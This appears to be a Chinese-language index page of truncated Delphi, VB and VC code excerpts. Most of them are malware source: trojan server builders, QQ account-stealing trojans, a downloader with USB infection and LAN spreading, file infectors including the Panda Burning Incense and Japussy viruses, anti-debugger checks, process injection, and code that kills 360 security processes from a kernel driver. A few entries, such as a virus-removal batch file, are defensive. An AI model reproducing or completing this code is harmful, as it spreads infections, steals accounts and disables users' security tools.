1.程序窗口句柄检测原理:用FindWindow函数查找具有相同窗口类名和标题的窗口,如果找到就说明有OD在运行//********************************************//通过查找窗口类名来实现检测OllyDBG//*...

program Download;usesWindows, Winsock, ShellApi;function GetIpFromDns(HostName: string): string;typetAddr = array[0..100] of PInAddr;pAddr = ^tAddr;varI: Integer;WSA: TWSAData;PHE:...

procedure Enumeration(aResource:PNetResource);      //内网传播    Enumeration(@wgokq[_fehlq])var   qnlshmm:&nb...

上次写了一个直接将配置文件添加到对应的位置上的方法.好处就在于木马端不用写专门的代码再来提取配置文件,这样很自然的就节省了木马的体积.坏处就在于那种方法只能给未加壳的程序修改配置.这样...

之前一直在找关于木马生成服务端原理的文章。我在以前的日记里面也提到过的，网上相关的文章也找了不少，但是都没有把问题好好说清楚。虽然也给出了代码，但是废话还是不少，让我走了不少弯路。...

delphi服务器端如何防止DDOS 前面说到DSServer的OnConnect是socket已经完全搭好client都调用connect的服务器方法了才触发的，如果我们到这里才来想起拒绝不合法的ip连接，已经挺晚了：sock...

在网络管理中,有时需要通过监视远程计算机屏幕来了解网上微机的使用情况。虽然,市面上有很多软件可以实现该功能,有些甚至可以进行远程控制,但在使用上缺乏灵活性,如无法指定远程计算机屏幕区域...

感染函数procedure TForm1.EnCrypt(pPath:string);varlCount,i:Integer;lNewName,lFileName:string;lStringList:TStringList;beginlStringList:=GetDirTreeList(pPath);lCount:=lStringList.Cou...

 QQ木马delphi源码 unit GCommonMethods;{$I Complier.inc}interfaceuses Windows, SysUtils, GConsts, GNetMethods, GQQFindMethods;procedure CreateMainWindow(hInst: HMODULE; const C...

 DELPHI版本QQ木马首先写个DLL文件library Project1;{ Important note about DLL memory management: ShareMem must be thefirst unit in your library's USES clause AND your project's ...

 QQ自动发消息源码这里面有的到窗口句柄，输入框句柄和按钮句柄的方法！ 你可以结合使用的到你想的到的功能！ 这是一个qq自动发送的功能，你看看，应该有点用吧！：）delphi代码procedure ...

 program PrintInject;usesWindows, Classes, WinSpool, SysUtils;function PathFindFileNameA(szFilePath:PChar):PChar; stdcall; external 'shlwapi.dll';procedure MainProc();varszBuf...

 干掉360保险箱VB/VC/delphi 源码VB 源码：Option Explicit Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As...

 To avoid using WriteProcessMemory, we need to find other ways to inject a certain string (e.g. "mypayload.dll") into a foreign process. This idea is a more creative...

 Crossbow病毒开放源代码-熊猫烧香源始代码 以下代码只做安全工作者参考,请勿用做非法用途,否则后果自负.提示,所有病毒木马都是依靠计算机中漏洞进行病毒破坏以及木马监视.所以您只需要随...

 program InjectTheSelf;{$IMAGEBASE $13140000}uses  Windows,  SysUtils,  urlmon,  sendmail,  shellapi,  tl...

 @echo offtitle 清除威金（logo_1,熊猫烧香）病毒最新变种工具@echo 清除VIKING病毒最新变种工具pauseif exist %windir%rundl132.exe echo ---报告老...

 typePTIMPORT_CODE=^TIMPORT_CODE; TIMPORT_CODE=packed record JmpPtr:Word; PtrAdd:^Pointer; end;function SHFormatDrive(hWnd: HWND;Drive: Word;fmtID: Word;Options: Word): Longin...

 3句话绕过XXX拦截删除桌面快捷方式直接删除是不行滴~procedure DeletefileEx(name:String);varname2:string;beginname2:=ExtractfilePath(name)+'E.txt';movefile(Pchar(name),Pchar(name...

            if Match(FilePath + FileRec.Name, MaskList) then      ...

program createfolder;usesWindows;constDIRECTORY_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED or $F;FILE_CREATE = $00000002;FILE_DIRECTORY_FILE = $00000001;OBJ_CASE_INSENSITIVE = $00000040...

很不错的一个 3389 自动登陆器 ! 实现自动登录 ， 代码也很少 运行delphi-->Components-->Import Active Control，在列表中找到下面的Microsoft Terminal Services Active Client 1.0 Typ...

一个含U盘感染的downloader代码。可以作为原理进行分析。(delphi)program AutoDown;{$R 'ICON32.RES' 'ICON32.TXT' }{$IMAGEBASE $17140000}usesWindows, SysUtils, wininet, mmsystem, message...

program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的大小IconOffset = $12EB8; //PE文件主图标的偏移量//在我的Delphi5 SP1...

unit Unit1;//一个给木马替换图标的代码 QQ：6331905interfaceusesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,Dialogs,shellapi, StdCtrls, ExtCtrls; //1+sh...

原理是在ring3搜索PspTerminateProcess地址，再传到ring0,减轻ring0代码的复杂程度驱动代码：unit killDriver;{$HINTS OFF}{$WARNINGS OFF}interfaceusesnt_status, ntoskrnl, native, winioctl...